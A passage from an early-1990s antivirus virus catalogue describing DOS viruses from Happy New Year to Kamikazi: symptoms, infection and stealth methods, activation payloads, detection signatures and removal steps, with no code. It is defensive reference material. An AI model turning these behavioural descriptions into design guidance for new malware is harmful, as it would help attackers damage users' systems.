Status: New Discovered: December, 1989 Symptoms: TSR; .COM & .EXE Growth; Floppy Boot Sector altered; Boot failures; Bad or missing command interpretor message Origin: Bulgaria Eff Length: 1,600 Bytes Type Code: PRsAK - Resident Parasitic .COM & .EXE Infector Detection Method: ViruScan V74+ Removal Instructions: Scan/D, or Delete infected files General Comments: The Happy New Year, or V1600, Virus was submitted in December, 1990. This virus is originally from Bulgaria, and is a memory resident infector of .COM and .EXE files. It will infect COMMAND.COM. The first time a program infected with the Happy New Year Virus is executed, the virus will install itself memory resident as a 2,432 bytes low system memory TSR. Interrupt 21 will be hooked by the virus. At this time, the virus will also make a slight alteration to the floppy boot sector, and infect COMMAND.COM. Infected COMMAND.COM files will not show a file length increase as the virus will overwrite a portion of the hex 00 section of the file. The altered floppy boot sector does not contain a copy of the virus, and is not infectious. Once Happy New Year is memory resident, it will infect .COM and .EXE programs as they are executed. Infected programs will increase in length by 1,600 bytes and have the virus located at the end of the infected file. The following text message can be found in infected programs: "Dear Nina, you make me write this virus; Happy new year!" "1989" This message is not displayed by the virus. Systems infected with the Happy New Year Virus may fail to boot, receiving a "Bad or missing command interpretor" message if COMMAND.COM is infected on the boot diskette or hard drive. It is unknown if Happy New Year carries any destructive capabilities. Known variant(s) of Happy New Year are: Happy New Year B : Similar to Happy New Year, this variant has five bytes which differ from the original virus. Unlike Happy New Year, COMMAND.COM will only be infected if it is executed for some reason. Virus Name: Holland Girl Aliases: Sylvia V Status: Rare Discovered: December, 1989 Symptoms: .COM growth, TSR Origin: Netherlands Eff Length: 1,332 Bytes Type Code: PRsC - Resident Parasitic .COM Infector Detection Method: ViruScan V50+, F-Prot, IBM Scan, Pro-Scan, VirexPC, AVTK 3.5+, VirHunt 2.0+ Removal Instructions: F-Prot, Pro-Scan 1.4+, VirHunt 2.0+, or Scan/D General Comments: The Holland Girl or Sylvia Virus was first reported by Jan Terpstra of the Netherlands. This virus is memory resident and infects only .COM files, increasing their size by 1,332 bytes. The virus apparently does no other damage, and does not infect COMMAND.COM. The virus's name is due to the fact that the virus code contains the name and phone number of a girl named Sylvia in Holland, along with her address, requesting that post cards be sent to her. The virus is believed to have been written by her ex-boyfriend. Also see: Holland Girl 2 Virus Name: Holland Girl 2 Aliases: Sylvia 2 V Status: New Discovered: January, 1991 Symptoms: .COM growth Origin: New Brunswick, Canada Eff Length: 1,332 Bytes Type Code: PNC - Resident Parasitic .COM Infector Detection Method: Removal Instructions: Delete infected files General Comments: The Holland Girl 2, or Sylvia 2, Virus was discovered in New Brunswick, Canada in January 1991. This virus is similar to the Holland Girl Virus, though it has been altered significantly. This virus is a non- resident infector of .COM files, including COMMAND.COM. When a program infected with the Holland Girl 2 Virus is executed, the virus will infect up to four .COM files. It first checks the C: drive root directory to look for candidate files, then the current drive and current directory. .COM Programs infected with the Holland Girl 2 Virus will increase in length by 1,332 bytes with the virus being located at the beginning of the infected program. Infected programs will also contain the following text: "This program is infected by a HARMLESS Text-Virus V2.1" "Send a FUNNY postcard to : Sylvia" "You might get an ANTIVIRUS program....." Sylvia's last name, and full address are in the virus in plain text, and are not repeated here for privacy reasons. Also see: Holland Girl Virus Name: Holocaust Aliases: Stealth, Holo V Status: Rare Discovered: December, 1990 Symptoms: decrease in system & available memory; file allocation errors Origin: Barcelona, Spain Eff Length: 3,784 Bytes Type Code: PRhCK - Resident Parasitic .COM Infector Detection Method: ViruScan V74+ Removal Instructions: Scan/D, or Delete infected files General Comments: The Holocaust Virus was submitted in December, 1990 by David Llamas of Barcelona, Spain. Holocaust is a self-encrypting memory resident infector of .COM files, including COMMAND.COM. This virus is qualifies as a Stealth virus as it hides the file length increase on infected files as well as infecting on file open and execution. The first time a program infected with the Holocaust Virus is executed, the virus will install itself memory resident. It will reserve 4,080 bytes of high system memory below the 640K DOS boundary. This memory will be marked as Command Data, and interrupt 21 will be hooked. Some memory mapping utilities will show the memory resident command interpretor to have grown by the 4,080 bytes, though it is actually in high memory instead of low memory. Once Holocaust is memory resident, it will infect COM programs which are executed or openned for any reason. This virus, however, will not infect very small COM files of less than 1K in size. Infected COM programs will increase in size by 3,784 bytes, though this file size increase will not be seen in a directory listing if the virus is memory resident. The viral code will be located at the end of infected files. If the Holocaust Virus is memory resident and the DOS ChkDsk command is executed, infected files will be indicated as having a file allocation error. Execution of the command with the /F parameter on systems with the virus memory resident will result in the infected files becoming damaged. The file allocation errors do not occur if the virus is not in memory since at that time the directory size will match the file allocation in the FAT. The Holocaust Virus is a self-encrypting virus, and will occasionally produce an infected file which is encrypted differently from its original encryption mechanism. Some infected files will contain the following text at the end of the program, while other samples will have this text encrypted: "Virus Anti - C.T.N.E. v2.10a. ©1990 Grupo Holokausto. Kampanya Anti-Telefonica. Menos tarifas y mas servicio. Programmed in Barcelona (Spain). 23-8-90. - 666 -" Holocaust is reported by David Llamas to be widespread in Barcelona as of December, 1990. It is not known if this virus activates, and what it does on activation. It does not match a similar virus reported by Jim Bates of the United Kingdom named Spanish Telecom. Virus Name: Hybryd Aliases: Hybrid V Status: New Discovered: January, 1991 Symptoms: .COM growth Origin: Poland Eff Length: 1,306 Bytes Type Code: PRhA - Resident Parasitic .COM & .EXE Infector Detection Method: ViruScan V74+ Removal Instructions: Scan/D, or Delete infected files General Comments: The Hybryd Virus was submitted in January, 1991, and is from Poland. This virus is a non-resident direct action infector of .COM files, including COMMAND.COM. When a program infected with Hybryd is executed, the virus will look for an uninfected .COM program in the current directory. If an uninfected program is found, the virus will infect it. Infected .COM programs will have a file length increase of 1,306 bytes, the virus will be located at the end of the infected program. This virus alters the file time so that the seconds field in the file time is 62, the indicator that the file is infected. Just viewing the directory, though, it appears that the file date and time has not been altered. The following text strings are contained within the Hybryd Virus, though they cannot be viewed in infected files as they are encrypted: "(C) Hybryd Soft Specjalne podziekowania dla Andrzeja Kadlofa i Mariusza Deca za artykuly w Komputerze 11/88" In the submitted sample, the one text string that is not encrypted is the following, which is also found in replicated samples: "Copyright IBM Corp 1981,1987 Licensed Material - Program Property of IBM" This string should not be taken to indicate that IBM necessarily had anything to do with the creation of this virus. On Friday The 13ths starting in 1992, this virus will overwrite the current drive's boot sector when an infected program is executed. It may also corrupt program files at that time when they are executed. Virus Name: Hymn Aliases: V Status: Rare Discovered: December, 1990 Symptoms: .COM & .EXE growth; decrease in system and available free memory Origin: USSR Eff Length: 1,865 Bytes Type Code: PRhA - Resident Parasitic .COM & .EXE Infector Detection Method: ViruScan V74+ Removal Instructions: Scan/D, or Delete infected files General Comments: The Hymn Virus was submitted in December, 1990, and originated in the USSR. This virus is a memory resident infector of .COM and .EXE files, and will infect COMMAND.COM. The first time a program infected with the Hymn Virus is executed, the virus will install itself memory resident at the top of system memory but below the 640K DOS boundary. The DOS ChkDsk program will show that total system memory and available free memory have decreased by 3,712 bytes. This virus does not move the interrupt 12 return. COMMAND.COM will also become infected at this time. Once Hymn is memory resident, it will infect .COM and .EXE files which are over approximately 2K in length when they are executed or openned for any reason. Infected .COM files will increase in length by 1,865 bytes. Infected .EXE files will have a file length increase of 1,869 to 1,883 bytes. In both cases the virus will be located at the end of the infected file. Infected programs will contain two text strings within the viral code: "ibm@SNS" "@ussr@" It is not known what Hymn does when it activates, but it is assumed from the name that under some conditions it may play music. Virus Name: Icelandic Aliases: 656, One In Ten, Disk Crunching Virus, Saratoga 2 V Status: Extinct Discovered: June, 1989 Symptoms: .EXE growth, Resident TOM, bad sectors, FAT corruption Origin: Iceland Eff Length: 656 bytes Type Code: PRfE - Resident Parasitic .EXE Infector Detection Method: ViruScan/X V67+, F-Prot, Pro-Scan, VirexPC, AVTK 3.5+ VirHunt 2.0+ Removal Instructions: Scan/D/X, Pro-Scan 1.4+, VirexPC 1.1B, F-Prot, VirHunt 2.0+ General Comments: The Icelandic, or "Disk Crunching Virus", was originally isolated in Iceland in June 1989. This virus only infects .EXE files, with infected files growing in length between 656 and 671 bytes. File lengths after infection will always be a multiple of 16. The virus attaches itself to the end of the programs it infects, and infected files will always end with hex '4418,5F19'. The Icelandic virus will copy itself to the top of free memory the first time an infected program is executed. Once in high memory, it hides from memory mapping programs. If a program later tries to write to this area of memory, the computer will crash. If the virus finds that some other program has "hooked" Interrupt 13, it will not proceed to infect programs. If Interrupt 13 has not been "hooked", it will attempt to infect every 10th program executed. On systems with only floppy drives, or 10 MB hard disks, the virus will not cause any damage. However, on systems with hard disks larger than 10 MB, the virus will select one unused FAT entry and mark the entry as a bad sector each time it infects a program. Also see: Icelandic-II, Icelandic-III, Mix/1, Saratoga Virus Name: Icelandic-II Aliases: System Virus, One In Ten V Status: Extinct Discovered: July, 1989 Symptoms: .EXE growth, Resident TOM, FAT corruption date changes, loss of Read-Only Origin: Iceland Eff Length: 632 Bytes Type Code: PRfE - Parasitic Resident .EXE Infector Detection Method: ViruScan/X V67+, F-Prot, IBM Scan, Pro-Scan, VirexPC, AVTK 3.5+, VirHunt 2.0+ Removal Instructions: Scan/D/X, Pro-Scan 1.4+, VirexPC 1.1B, F-Prot, VirHunt 2.0+ General Comments: The Icelandic-II Virus is a modified version of the Icelandic Virus, and was isolated for the first time in July 1989 in Iceland. These two viruses are very similar, so only the changes to this variant are indicated here, refer to Icelandic for the base virus information. Each time the Icelandic-II virus infects a program, it will modify the file's date, thus making it fairly obvious that the program has been changed. The virus will also remove the read-only attribute from files, but does not restore it after infecting the program. The Icelandic-II virus can infect programs even if the system is running an anti-viral TSR that monitors interrupt 21, such as FluShot+. On hard disks larger than 10 MB, there are no bad sectors marked in the FAT as there is with the Icelandic virus. Also see: Icelandic, Icelandic-III, Mix/1, Saratoga Virus Name: Icelandic-III Aliases: December 24th V Status: Endangered Discovered: December, 1989 Symptoms: .EXE growth, Resident TOM, bad sectors, FAT corruption, Dec 24 message. Origin: Iceland Eff Length: 853 Bytes Type Code: PRfE - Parasitic Resident .EXE Infector Detection Method: ViruScan/X V67+, F-Prot, IBM Scan, Pro-Scan, VirexPC, AVTK 3.5+, VirHunt 2.0+ Removal Instructions: F-Prot, Scan/D/X, Pro-Scan 1.4+, VirexPC 1.1B, VirHunt 2.0+, or delete infected files General Comments: The Icelandic-III Virus is a modified version of the Icelandic Virus, and was isolated for the first time in December 1989 in Iceland. These two viruses are very similar, so only the changes to this variant are indicated here, refer to Icelandic for the base virus information. The Icelandic-III virus's id string in the last 2 words of the program is hex '1844,195F', the bytes in each word being reversed from the id string ending the Icelandic and Icelandic-II viruses. There are also other minor changes to the virus from the previous Icelandic viruses, including the addition of several NOP instructions. Before the virus will infect a program, it checks to see if the program has been previously infected with Icelandic or Icelandic-II, if it has, it does not infect the program. Files infected with the Icelandic-III virus will have their length increased by between 848 and 863 bytes. If an infected program is run on December 24th of any year, programs subsequently run will be stopped, later displaying the message "Gledileg jol" ("Merry Christmas" in Icelandic) instead. Also see: Icelandic, Icelandic-II, Mix/1, Saratoga Virus Name: IKV 528 Aliases: V Status: New Discovered: January, 1991 Symptoms: .COM & .EXE growth Origin: Unknown Eff Length: 528 Bytes Type Code: PNCK - Parasitic Non-Resident .COM Infector Detection Method: ViruScan V74+ Removal Instructions: Scan/D, or Delete infected files General Comments: The IKV 528 Virus was submitted in January, 1991, its origin and isolation point are unknown. This virus is a non-resident infector of .COM files. It will infect COMMAND.COM. When a program infected with IKV 528 is executed, the virus will infect two .COM programs in the current directory. .COM programs which are smaller than 520 bytes will not be infected. Infected .COM programs will increase in length by 528 bytes. The virus will be located at the end of infected programs. The file date and time in the disk directory will not be altered by the virus. This virus does not do anything besides replicate. Virus Name: Invader Aliases: Plastique Boot V Status: Common Discovered: September, 1990 Symptoms: TSR; .COM & .EXE growth; BSC; music Origin: Taiwan/China Eff Length: 4,096 Bytes Type Code: PRsAB - Parasitic Resident .COM, .EXE, & Boot Sector Infector Detection Method: ViruScan V67+, Pro-Scan 2.01+ Removal Instructions: Scan/D, CleanUp V67+, or Delete infected files General Comments: The Invader Virus was isolated in September, 1990 in China. This virus is a later version of the Plastique-B or Plastique 5.21 Virus. It is a memory resident infector of .COM and .EXE files, but not COMMAND.COM. It also infects boot sectors. In September 1990, many reports of infections of this virus have been received, it appears to have spread very rapidly. The first time a program infected with the Invader virus is executed, the virus will install itself memory resident as a low system memory TSR. The TSR is 5,120 Bytes and interrupts 08, 09, 13, and 21 will be hooked. At this time, the virus will also infect the boot sector of the drive where the infected program was executed. The new boot sector is an MSDOS 3.30 boot sector, and can be easily identified because the normal DOS error messages found in the boot sector are now at the beginning of the boot sector instead of the end. After the virus has become memory resident, any .COM or .EXE file (with the exception of COMMAND.COM) openned will be infected by the virus. Infected .COM files will increase in length by 4,096 bytes with the viral code being located at the beginning of the infected file. .EXE files will increase in length between 4,096 and 4,110 bytes with the viral code being located at the end of the infected file. Additionally, any non-write protected diskettes which are exposed to the infected system will have their boot sectors infected. The Invader Virus activates after being memory resident for 30 minutes. At that time, a melody may be played on the system speaker. On systems which play the melody, it will continue until the system is rebooted. The melody isn't played on 286 based systems, but is noticeable on the author's 386SX test machine. Also see: Plastique, Plastique-B Virus Name: Iraqui Warrior Aliases: Iraqui V Status: New Discovered: January, 1991 Symptoms: .COM growth; Closely spaced beeps from system speaker; system hangs; boot failures Origin: USA Eff Length: 777 Bytes Type Code: PNCK - Parasitic Non-Resident .COM Infector Detection Method: ViruScan V74+ Removal Instructions: Scan/D, or Delete infected files General Comments: The Iraqui Warrior Virus was isolated on January 17, 1991 in the United States. This virus is a non-memory resident infector of .COM files, including COMMAND.COM. It is based on the Vienna Virus. When a program infected with the Iraqui Warrior Virus is executed, the virus will infect one of the first four .COM files located on the current drive and current directory. Infected .COM files will have a file length increase of 777 bytes with the virus being located at the end of the file. The following text strings can be found in infected files, the first two occurring near the beginning of the virus, and the last being located very near the end of the infected file: "I come to you from The Ayatollah!" "©1990, VirusMasters" "An Iraqui Warrior is in your computer..." None of these messages are displayed by the virus. Systems infected with the Iraqui Warrior virus may occassionally experience the system speaker issuing a series of closely spaced beeps when an infected program is executed. When this occurs, the system will hang and have to be rebooted. The beeps continue until the reboot occurs. Booting from a disk where COMMAND.COM has been infected will result in a "Memory allocation error, Cannot start COMMAND, exiting" message appearing. The Iraqui Warrior does not appear to do anything else besides the above. Virus Name: Itavir Aliases: 3880 V Status: Endangered Discovered: March, 1990 Symptoms: .EXE growth, COMMAND.COM file, Boot sector corruption Origin: Italy Eff Length: 3,880 Bytes Type Code: PNE - Parasitic Non-Resident .EXE Infector Detection Method: ViruScan V60+, Pro-Scan 1.4+ Removal Instructions: Scan/D, or delete infected files General Comments: The Itavir virus was isolated in March 1990 by a group of students at the Milan Politechnic in Milan, Italy. The Itavir virus is a non-resident generic .EXE Infector. Infected files will increase in length by 3,880 bytes. Infected systems, besides having files which have increased in length, will usually have a file with the name COMMAND.COM somewhere on the disk. The first character of this file name is an unprintable character. The COMMAND.COM file contains the pure virus code and is used for appending to files as they are infected. The Itavir virus activates at some time period after the system has been running for more than 24 hours. When it activates, the boot sector is corrupted, rendering the system unbootable. The virus also displays a message in Italian and writes ansi values from 0 thru 255 to all available I/O ports, thus confusing any attached peripheral devices. Some monitors may show a flickering effect when this occurs, while some VGA monitors may actually "hiss". Virus Name: Jeff Aliases: V Status: Rare Discovered: December, 1990 Symptoms: .COM growth; overwritten sectors on hard disk Origin: USA Eff Length: 814 Bytes Type Code: PNCK - Parasitic Non-Resident .COM Infector Detection Method: ViruScan V72+, Pro-Scan 2.01+ Removal Instructions: Scan/D, or Delete infected files General Comments: The Jeff Virus was isolated in the United States in December, 1990. This virus is a non-resident infector of .COM files, including COMMAND.COM. When a program infected with the Jeff Virus is executed, the virus will attempt to infect one .COM file on the C: drive, starting in the root directory. Infected .COM files will increase in size by 814 to 828 bytes, with the virus being located at the end of the infected program. The Jeff Virus received its name from the following text string which is encrypted in the viral code: "Jeff is visiting your hard disk" While Jeff is visiting your hard disk, it will occasionally write some sectors of random memory contents to the hard disk. If these sectors are written to the boot sector, partition table, or FAT, the contents of the disk may become inaccessible or produce unexpected results. Virus Name: Jerusalem Aliases: PLO, Israeli, Friday 13th, Russian, 1813(COM), 1808(EXE) V Status: Common Discovered: October, 1987 Symptoms: TSR, .EXE & .COM growth, system slowdown, deleted files on Friday 13th, "Black WIndow" Origin: Israel Eff Length: 1,813 (COM files) & 1,808 (EXE files) bytes Type Code: PRsA - Parasitic Resident .COM & .EXE Infector Detection Method: ViruScan, F-Prot, IBM Scan, Pro-Scan, VirexPC 1.1+, AVTK 3.5+, VirHunt 2.0+ Removal Instructions: Scan/D/A, Saturday, CleanUp, UnVirus, F-Prot, VirexPC 1.1+, Pro-Scan 1.4+ General Comments: The Jerusalem Virus was originally isolated at Hebrew University in Israel in the Fall of 1987. Jerusalem is a memory resident infector of .COM and .EXE files, with .EXE file being reinfected each time they are executed due to a bug in the virus. This virus redirects interrupt 8, and 1/2 hour after execution of an infected program the system will slow down by a factor of 10. Additionally, some Jerusalem Virus variants will have a "Black Window" or "Black Box" appear on the lower left side of the screen which will scroll up the screen as the screen scrolls. On Friday The 13ths, after the virus is installed in memory, every program executed will be deleted from disk. The identifier for some strains is "sUMsDos", however, this identifier is usually not found in the newer variants of Jerusalem. The Jerusalem Virus is thought to have been based on the Suriv 3.00 Virus, though the Suriv 3.00 Virus was isolated after the Jerusalem Virus. Also see: Jerusalem B, New Jerusalem, Payday, Suriv 3.00 Virus Name: Jerusalem B Aliases: Arab Star, Black Box, Black Window, Hebrew University V Status: Common Discovered: January, 1988 Symptoms: TSR, .EXE & .COM growth, system slowdown, deleted files on Friday 13th, "Black WIndow" Origin: Israel Eff Length: 1,813 (.COM files) & 1,808 (.EXE files) bytes Type Code: PRsA - Parasitic Resident .COM & .EXE Infector Detection Method: ViruScan, F-Prot, IBM Scan, Pro-Scan, VirexPC 1.1+, AVTK 3.5+, VirHunt 2.0+ Removal Instructions: F-Prot, Saturday, CleanUp, UnVirus, VirexPC 1.1+ Pro-Scan 1.4+ General Comments: Identical to the Jerusalem virus, except that in some cases it does not reinfect .EXE files. Jerusalem B is the most common of all PC viruses, and can infect .SYS and program overlay files in addition to .COM and .EXE files. Not all variants of the Jerusalem B virus slow down the system after an infection has occurred. Also, it should be noted that Jerusalem viruses will only activate if they actually become memory resident on their activation date. If the system clock rolls over to the activation date and the virus is already memory resident, they will not typically activate and perform any destructive behavior they may be intended to perform. Known variants of Jerusalem B are: A-204 : Jerusalem B with the sUMsDos text string changed to A-204, and a couple of instructions changed in order to avoid detection. This variant will slow down the system after being memory resident for 30 minutes, as well as having a black box appear at that time. Origin: Delft, The Netherlands Anarkia : Jerusalem B with the timer delay set to slow down the system to a greater degree, though this effect doesn't show until a much longer time has elapsed. No Black Box is never displayed. The sUMsDos id-string has been changed to ANARKIA. Lastly, the virus's activation date has been changed to Tuesday The 13ths, instead of Friday The 13ths. Origin: Spain Anarkia-B : Similar to Anarkia, with the exception that the virus now activates on any October 12th instead of on Tuesday The 13ths. Jerusalem-C: Jerusalem B without the timer delay to slow down the processor. Jerusalem-D: Jerusalem C which will destroy both copies of the FAT on any Friday The 13th after 1990. Jerusalem-E: Jerusalem D but the activation is in 1992. Mendoza : Based on the Jerusalem B virus, this variant does not reinfect .EXE files. It is also missing the black box effect. Mendoza activates in the second half of the year (July - December), at which time any day will have a 10% chance of having all programs executed deleted. Origin: Argentina Park ESS: Isolated in October, 1990 in Happy Camp, California, this variant is very similar to other Jerusalem viruses. Infected .COM files increase in length by 1,813 bytes, and infected .EXE files will increase in length by 1,808 to 1,822 bytes with the first infection, and 1,808 on later subsequent infections. This variant will also infect COMMAND.COM. The other major difference from the "normal" Jerusalem is that the sUMsDos string has been replaced. The string PARK ESS can be found in the viral code within all infected files. This variant slows down the system by approximately 20 percent and a "black window" will appear after the virus has been memory resident for 30 minutes. Puerto : Isolated in June, 1990 in Puerto Rico, this variant is very similar to the Mendoza variant, the virus contains the sUMsDos id-string. .EXE files may be infected multiple times. Skism-1 : Isolated in December, 1990 in New York State, this variant is similar to many other Jerusalems except with regards to when and what it does upon activation. Rather than activate on Friday The 13ths and delete files, this variant activates in the years 1991 and later on any Friday which occurs after the 15th of the month. On activation, it truncates any file which is attempted to be executed to zero bytes. COM files will increase in size upon infection by 1,808 bytes, EXE files will increase by 1,808 to 1,822 bytes. EXE files will be reinfected by the virus. The sUMsDos string in the virus is now SKISM-1. Like Jerusalem, this variant produces a "black window" 30 minutes after becoming memory resident, and also slows down the system. Spanish JB : Similar to Jerusalem, it reinfects .EXE files. The increased file size on .COM files is always 1,808 bytes. On .EXE files, the increased file size may be either 1,808 or 1,813, with reinfections always adding 1,808 bytes to the already infected file. No "Black Box" appears. The characteristic sUMsDos id-string does not appear in the viral code. This variant is also sometimes identified as Jerusalem E2. Origin: Spain Jerusalem DC: Similar to Jerusalem B, this variant has the sUMsDos text string changed to 00h characters. After being memory resident for 30 minutes, the system will slow down by 30% and the common "black window" will appear on the lower left side of the screen. Like Jerusalem, it will infect .EXE files multiple times. This variant does not carry an activation date when it will delete files, it appears for all intents to be "defanged". Origin: Washington, DC, USA Also see: Jerusalem, Frere Jacques, New Jerusalem, Payday, Suriv 3.00, Westwood Virus Name: JoJo Aliases: V Status: Rare Discovered: May, 1990 Symptoms: .COM growth, system hangs Origin: Israel Eff Length: 1,701 Bytes Type Code: PRaC - Parasitic Resident .COM Infector Detection Method: ViruScan V63+, Pro-Scan 1.4+, VirexPC, F-Prot 1.12+ Removal Instructions: Scan/D, F-Prot 1.12+, Pro-Scan 2.01+ General Comments: The JoJo virus was discovered in Israel in May, 1990. The virus' name comes from a message within the viral code: "Welcome to the JOJO Virus." One other message appears within the virus, indicating that it was written in 1990. This message is: "Fuck the system © - 1990". Both messages within the viral code are never displayed. When the first file infected with the JoJo Virus is executed on a system, the virus will install itself memory resident. The method used is to alter the Command Interpreter in memory, expanding its size. As an example, on my test system, the Command Interpreter in memory increased in size from 3,536 bytes to 5,504 bytes. One block of 48 bytes is also reserved in available free memory. The change in free memory will be a net decrease of 2,048 bytes. The JoJo Virus will not infect files if interrupt 13 is in use by any other program. Instead the virus will clear the screen, and the system will be hung. If the user performs a warm reboot (Ctrl-Alt-Del), the virus will remain in memory. Once the virus is able to become memory resident with interrupt 13 hooked, any .COM file executed will be infected by the virus. Infected files will increase in length by 1,701 bytes. While this virus has the same length as the Cascade/1701 Virus, it is not a variant of Cascade. Also see: JoJo 2 Virus Name: JoJo 2 Aliases: V Status: New Discovered: January, 1991 Symptoms: .COM growth; Message; "Not enough memory" errors; system hangs; cursor position off 1 character Origin: United States Eff Length: 1,703 Bytes Type Code: PRaCK - Parasitic Resident .COM Infector Detection Method: Removal Instructions: Delete infected files General Comments: The JoJo 2 Virus was submitted in January, 1991, by David Grant of the United States. This virus is based on the JoJo Virus as well as containing part of the decryption string for the Cascade Virus. It is a memory resident infector of .COM files, including COMMAND.COM. The first time a program infected with the JoJo 2 Virus is executed, the virus will install itself memory resident by altering the command interpretor in memory. The command interpretor in memory will have a size increase of 1,904 bytes. There is an additional 48 bytes which is reserved by the virus as well, similar to JoJo. Once the virus is memory resident, it will infect .COM files as they are executed. If COMMAND.COM is executed for any reason, it will become infected. Infected .COM programs will have a file size increase of 1,703 bytes with the virus being located at the end of the infected file. Text strings which can be found in files infected with the JoJo 2 Virus are: "The JOJO virus strikes again.xxxxxxxxxxxx zzz" "Fuck the system 1990 - ©" "141$FLu" Systems infected with the JoJo 2 virus may experience system hangs when some infected programs are executed. Infected programs may also display the "Fuck the system 1990 - ©" string, or a string of garbage characters from memory. Attempts to execute some programs may also fail due to "Not enough memory" errors. Lastly, after the virus has been resident for awhile, the user may notice that the cursor on the system monitor is off by one position to the right from where it should be. JoJo 2 may be detected by some anti-viral utilities as an infection of JoJo and Cascade/1701/1704. Also see: JoJo Virus Name: Joker Aliases: Jocker V Status: Extinct Discovered: December, 1989 Symptoms: Messages, .EXE/.DBF growth Origin: Poland Eff Length: ??? Bytes Type Code: PNE - Parasitic Non-Resident .EXE Infector Detection Method: ViruScan/X V67+, Pro-Scan, VirexPC Removal Instructions: Scan/D/X, or delete infected files General Comments: The Joker Virus was isolated in Poland in December, 1989. This virus is a generic .EXE file infector, and is a poor replicator (ie. it does not quickly infect other files). Programs which are infected with the Joker virus will display bogus error messages and comments. These messages and comments can be found in the infected files at the beginning of the viral code. Here are some of the messages and comments that may be displayed: "Incorrect DOS version" "Invalid Volume ID Format failure" "Please put a new disk into drive A:" "End of input file" "END OF WORKTIME. TURN SYSTEM OFF!" "Divide Overflow" "Water detect in Co-processor" "I am hungry! Insert HAMBURGER into drive A:" "NO SMOKING, PLEASE!" " Thanks." "Don't beat me !!" "Don't drink and drive." "Another cup of cofee ?" " OH, YES!" "Hard Disk head has been destroyed. Can you borow me your one?" "Missing light magenta ribbon in printer!" "In case mistake, call GHOST BUSTERS" "Insert tractor toilet paper into printer." This virus may also alter .DBF files, adding messages to them. The sample in the author of this listing possession does not replicate on an 8088 based system. This entry has been included since the sample may have been damaged before its receipt by the author. At best, there is a serious bug in the replication portion of this virus which prevents it from replicating. Virus Name: Joshi Aliases: Happy Birthday Joshi, Stealth Virus V Status: Common Discovered: June, 1990 Symptoms: BSC, machine hangs and message Origin: India Eff Length: N/A Type Code: BRX - Resident Boot Sector/Partition Table Infector Detection Method: ViruScan V64+, Pro-Scan 1.4+ Removal Instructions: CleanUp V66+, Pro-Scan 1.4+, RmJoshi, or Low-Level Format Harddisk and DOS SYS floppies General Comments: The Joshi Virus was isolated in India in June 1990. At the time it was isolated, it was reported to be widespread in India as well as portions of the continent of Africa. Joshi is a memory resident boot sector infector of 5.25" diskettes. It will also infect hard disks, though in the case of hard disks it infects the partition table or master boot sector rather than the boot sector (sector 0). After a system has been booted from a Joshi-infected diskette, the virus will be resident in memory. Joshi takes up approximately 6K of system memory, and infected systems will show that total system memory is 6K less than is installed if the DOS CHKDSK program is run. Joshi has some similarities to two other boot sector infectors. Like the Stoned virus, it infects the partition table of hard disks. Similar to the Brain virus's method of redirecting all attempts to read the boot sector to the original boot sector, Joshi does this with the partition table. On January 5th of any year, the Joshi virus activates. At that time, the virus will hang the system while displaying the message: "type Happy Birthday Joshi" If the system user then types "Happy Birthday Joshi", the system will again be usable. This virus may be recognized on infected systems by powering off the system and then booting from a known-clean write-protected DOS diskette. Using a sector editor or viewer to look at the boot sector of suspect diskettes, if the first two bytes of the boot sector are hex EB 1F, then the disk is infected. The EB 1F is a jump instruction to the rest of the viral code. The remainder of the virus is stored on track 41, sectors 1 thru 5 on 360K 5.25 inch Diskettes. For 1.2M 5.25 inch diskettes, the viral code is located at track 81, sectors 1 thru 5. To determine if a system's hard disk is infected, you must look at the hard disk's partition table. If the first two bytes of the partition table are EB 1F hex, then the hard disk is infected. The remainder of the virus can be found at track 0, sectors 2 thru 6. The original partition table will be a track 0, sector 9. The Joshi virus can be removed from an infected system by first powering off the system, and then booting from a known-clean, write- protected master DOS diskette. If the system has a hard disk, the hard disk should have data and program files backed up, and the disk must be low-level formatted. As of July 15, 1990, there are no known utilities which can disinfect the partition table of the hard disk when it is infected with Joshi. Diskettes are easier to remove Joshi from, the DOS SYS command can be used, or a program such as MDisk from McAfee Associates, though this will leave the viral code in an inexecutable state on track 41. Virus Name: July 13TH Aliases: V Status: Endangered Discovered: April, 1990 Symptoms: .EXE file growth, screen effects on July 13 Origin: Madrid, Spain Eff Length: 1,201 Bytes Type Code: PNE - Parasitic Non-Resident .EXE Infector Detection Method: ViruScan V64+, VirexPC, F-Prot 1.12+ Removal Instructions: Scan/D, F-Prot 1.12+, or delete infected files General Comments: The July 13TH Virus was isolated in Madrid, Spain, in April 1990 by Guillermo Gonzalez Garcia. This virus is a generic .EXE file infector, and is not memory resident. When a program infected with the July 13TH Virus is executed, the virus will attempt to infect a .EXE file. Files are only infected if they are greater in length than 1,201 bytes. Infected files increase in size by 1,201 to 1,209 bytes. The July 13TH Virus activates on July 13th of any year. At that time, a bouncing ball effect occurs on the system monitor's screen similar to the bouncing ball effect of the Ping Pong virus. While this virus is disruptive, it does not cause any overt damage to files other than infecting them. The bouncing ball effect created by this virus will occasionally leave dots on the screen where it was passing if the screen has been scrolled for any reason. Virus Name: June 16TH Aliases: Pretoria V Status: Endangered Discovered: April, 1990 Symptoms: .COM file growth, long disk accesses, June 16th FAT alteration Origin: Republic of South Africa Eff Length: 879 Bytes Type Code: PNC - Parasitic Non-Resident .COM Infector Detection Method: ViruScan V62+, Pro-Scan 1.4+, VirexPC, AVTK 3.5+, F-Prot 1.12+, VirHunt 2.0+ Removal Instructions: VirHunt 2.0+, Scan/D, Pro-Scan 2.01+ General Comments: The June 16TH, or Pretoria, virus was discovered in April 1990. This virus is a non-resident generic .COM file infector, and is encrypted. The first time an infected file is executed, the virus will search the current drive (all directories) and infect all .COM files found. The search period can be quite long, and it is very obvious on hard disk based systems that the program is taking too long to load. On June 16TH of any year, the first time an infected file is executed the virus will activate. On activation, the virus will change all entries in the root directory and the file allocation table to "ZAPPED". The June 16TH virus is thought to have originated in South Africa. Virus Name: Kamikazi Aliases: V Status: Endangered Discovered: August, 1990 Symptoms: program corruption, system hangs, system reboots Origin: Bulgaria Eff Length: 4,031 Bytes Type Code: ONE - Overwriting Non-Resident .EXE Infector Detection Method: Pro-Scan 2.01+ Removal Instructions: Delete infected files General Comments: The Kamikazi Virus was submitted by Vesselin Bontchev of Bulgaria in August, 1990. This virus is a non-resident overwriting virus, and infects .EXE files. When a program infected with the Kamikazi virus is executed, the virus will infect another .EXE file in the current directory if the .EXE file's length is greater than 4,031 bytes. Kamikazi simply overwrites the first 4,031 bytes of the candidate program with its viral code, thus permanently damaging the candidate program being infected. The original 4,031 bytes of code is not stored at any other location. Infected files do not change in length. After infecting another .EXE program, the virus will then change the first 8 bytes of the infected program that was executed to 